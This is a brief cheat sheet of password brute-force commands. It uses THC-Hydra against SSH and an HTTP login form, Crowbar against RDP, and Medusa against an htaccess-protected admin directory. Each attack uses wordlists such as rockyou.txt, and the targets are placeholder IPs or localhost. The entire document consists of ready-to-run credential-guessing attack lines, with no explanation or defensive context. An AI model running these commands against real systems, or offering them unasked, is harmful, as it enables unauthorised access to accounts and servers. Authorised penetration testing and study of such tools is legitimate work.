#SSH Attack with THC-Hydra
• hydra -l kali -P /usr/share/wordlists/rockyou.txt ssh://127.0.0.1
------------------------
#Remote Desktop Protocol Attack with Crowbar
• crowbar -b rdp -s XX.XX.XX.XX/32 -u admin -C ~/password-file.txt -n 1
------------------------
#HTTP htaccess Attack with Medusa
•  medusa -h XX.XX.XX.XX -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin
------------------------
#HTTP POST Attack with THC-Hydra
• hydra XX.XX.XX.XX http-form-post "/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f
